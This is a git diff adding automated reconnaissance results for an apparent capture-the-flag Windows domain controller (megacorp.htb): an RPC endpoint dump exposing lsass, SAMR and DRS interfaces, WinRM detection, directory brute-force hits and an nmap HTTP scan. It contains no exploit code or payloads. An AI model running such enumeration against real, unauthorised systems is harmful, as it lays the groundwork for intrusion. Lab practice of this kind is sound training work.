N/A +Provider: N/A +UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: sysntfy.dll +UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name +Bindings: + ncalrpc:[LRPC-78c65697da0c3cb9e7] + ncalrpc:[LRPC-5d1d91fbc9832f3673] + ncalrpc:[IUserProfile2] + ncalrpc:[LRPC-7f9f9d7e564fa27a15] + ncalrpc:[senssvc] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0] + ncalrpc:[OLE59700168EED37EDF88950A0917DC] + +Protocol: N/A +Provider: nsisvc.dll +UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint +Bindings: + ncalrpc:[LRPC-9ec11ee764d799175d] + +Protocol: N/A +Provider: nrpsrv.dll +UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint +Bindings: + ncalrpc:[LRPC-99bbae991f0f6e961a] + +Protocol: N/A +Provider: N/A +UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module +Bindings: + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 +Bindings: + ncalrpc:[LRPC-7d4055d4f64c73ef42] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: dhcpcsvc.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc] + ncalrpc:[dhcpcsvc6] + +Protocol: N/A +Provider: dhcpcsvc6.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc6] + +Protocol: [MS-EVEN6]: EventLog Remoting Protocol +Provider: wevtsvc.dll +UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP +Bindings: + ncacn_ip_tcp:10.129.243.131[49665] + ncacn_np:\\DC[\pipe\eventlog] + ncalrpc:[eventlog] + +Protocol: N/A +Provider: gpsvc.dll +UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface +Bindings: + ncalrpc:[LRPC-1e815b36ff28d761c1] + +Protocol: N/A +Provider: N/A +UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: schedsvc.dll +UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: N/A +UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 +Bindings: + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: schedsvc.dll +UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 +Bindings: + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-a3db541015ee3b4092] + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: BFE.DLL +UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API +Bindings: + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service +Bindings: + ncacn_np:\\DC[\PIPE\wkssvc] + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs +Bindings: + ncalrpc:[OLE5FCB0823110EF79154A84BC1C955] + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: iphlpsvc.dll +UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint +Bindings: + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-NRPC]: Netlogon Remote Protocol +Provider: netlogon.dll +UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-RAA]: Remote Authorization API Protocol +Provider: N/A +UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote +Provider: lsasrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0 +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol +Provider: ntdsai.dll +UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol +Provider: samsrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: srvsvc.dll +UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: sysmain.dll +UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 +Bindings: + ncalrpc:[LRPC-6ba6be7619ad5499b5] + +Protocol: N/A +Provider: N/A +UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server +Bindings: + ncalrpc:[LRPC-e9c9cb51676dd7958e] + +Protocol: N/A +Provider: IKEEXT.DLL +UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API +Bindings: + ncalrpc:[LRPC-a6cbf0f8554ac2dd0e] + +Protocol: N/A +Provider: N/A +UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs +Bindings: + ncalrpc:[LRPC-78511121f1275f430c] + ncalrpc:[VpnikeRpc] + ncalrpc:[RasmanLrpc] + ncacn_np:\\DC[\PIPE\ROUTER] + +Protocol: [MS-SCMR]: Service Control Manager Remote Protocol +Provider: services.exe +UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49678] + +Protocol: [MS-CMPO]: MSDTC Connection Manager: +Provider: msdtcprx.dll +UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 +Bindings: + ncalrpc:[LRPC-3bcaafee1590c0de20] + ncalrpc:[OLE17B51056E4D45A611212712C1451] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + +Protocol: N/A +Provider: N/A +UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 +Bindings: + ncalrpc:[LRPC-802031e034c1f025bd] + +Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management +Provider: dns.exe +UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49695] + +Protocol: [MS-FRS2]: Distributed File System Replication Protocol +Provider: dfsrmig.exe +UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service +Bindings: + ncacn_ip_tcp:10.129.243.131[49843] + ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0] + +Protocol: N/A +Provider: N/A +UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0 +Bindings: + ncalrpc:[LRPC-92939372b55364a6c8] + ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060] + +[*] Received 405 endpoints. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt new file mode 100644 index 00000000..b917c34d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt @@ -0,0 +1,2 @@ +WinRM was possibly detected running on tcp port 5985. +Check _manual_commands.txt for manual commands you can run against this service. \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html new file mode 100644 index 00000000..61c8cab1 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html @@ -0,0 +1,50 @@ +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +Accept-Ranges: bytes +ETag: "0eaf6d7c895d71:0" +Server: Microsoft-IIS/10.0 +Date: Sat, 28 Oct 2023 13:05:55 GMT +Content-Length: 1034 + + + + + + Slandovia Energy + + + + + + + +
+ + + + +
+ +

MegaCorp

+

+ Slandovia Energy Grid +

+ +
+ + + + + + +
    + no results +
+
+ + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt new file mode 100644 index 00000000..9e57635c --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt @@ -0,0 +1,21 @@ +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php +200 GET 8l 168w 1092c http://10.129.243.131/License.txt +200 GET 1l 14w 116c http://10.129.243.131/SEARCH.php +200 GET 41l 66w 1034c http://10.129.243.131/INDEX.html diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt new file mode 100644 index 00000000..0d915fe8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt @@ -0,0 +1,106 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.033s latency). +Scanned at 2023-10-28 14:27:58 CEST for 128s + +Bug in http-security-headers: no string output. +PORT STATE SERVICE REASON VERSION +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +| http-headers: +| Content-Length: 1034 +| Content-Type: text/html +| Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +| Accept-Ranges: bytes +| ETag: "0eaf6d7c895d71:0" +| Server: Microsoft-IIS/10.0 +| Date: Sat, 28 Oct 2023 13:05:55 GMT +| Connection: close +| +|_ (Request type: HEAD) +|_http-config-backup: ERROR: Script execution failed (use -d to debug) +|_http-server-header: Microsoft-IIS/10.0 +|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) +|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. +| http-php-version: Logo query returned unknown hash a38e7a4db6688b811d52e1eab13a9b5c +|_Credits query returned unknown hash a38e7a4db6688b811d52e1eab13a9b5c +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable +| http-comments-displayer: +| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=megacorp.htb +| +| Path: http://megacorp.htb:80/style.css +| Line number: 117 +| Comment: +| /* +| The following are styles purely for the surroundings +| */ +| +| Path: http://megacorp.htb:80/ +| Line number: 11 +| Comment: +| +| +| Path: http://megacorp.htb:80/ +| Line number: 37 +| Comment: +| +| +| Path: http://megacorp.htb:80/style.css +| Line number: 1 +| Comment: +|_ /* this declares a better box model */ +|_http-fetch: Please enter the complete path of the directory to save data in. +|_http-errors: Couldn't find any error pages. +|_http-mobileversion-checker: No mobile version detected. +| http-vhosts: +|_128 names had status 200 +|_http-dombased-xss: Couldn't find any DOM based XSS. +|_http-jsonp-detection: Couldn't find any JSONP endpoints. +| http-sitemap-generator: +| Directory structure: +| / +| Other: 1; css: 1; js: 1 +| Longest directory structure: +| Depth: 0 +| Dir: / +| Total files found (by extension): +|_ Other: 1; css: 1; js: 1 +| http-useragent-tester: +| Status for browser useragent: 200 +| Allowed User Agents: +| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) +| libwww +| lwp-trivial +| libcurl-agent/1.0 +| PHP/ +| Python-urllib/2.5 +| GT::WWW +| Snoopy +| MFC_Tear_Sample +| HTTP::Lite +| PHPCrawl +| URI::Fetch +| Zend_Http_Client +| http client +| PECL::HTTP +| Wget/1.13.4 (linux-gnu) +|_ WWW-Mechanize/1.34 +|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) +|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. +| http-referer-checker: +| Spidering limited to: maxpagecount=30 +|_ https://cdnjs.cloudflare.com:443/ajax/libs/prefixfree/1.0.7/prefixfree.min.js +|_http-feed: Couldn't find any feeds. +|_http-csrf: Couldn't find any CSRF vulnerabilities. +|_http-chrono: Request times for /; avg: 159.55ms; min: 156.41ms; max: 162.52ms +|_http-date: Sat, 28 Oct 2023 13:05:55 GMT; +37m49s from local time. +|_http-title: Slandovia Energy +|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php +|_http-malware-host: Host appears to be clean +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:30:06 2023 -- 1 IP address (1 host up) scanned in 133.76 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png 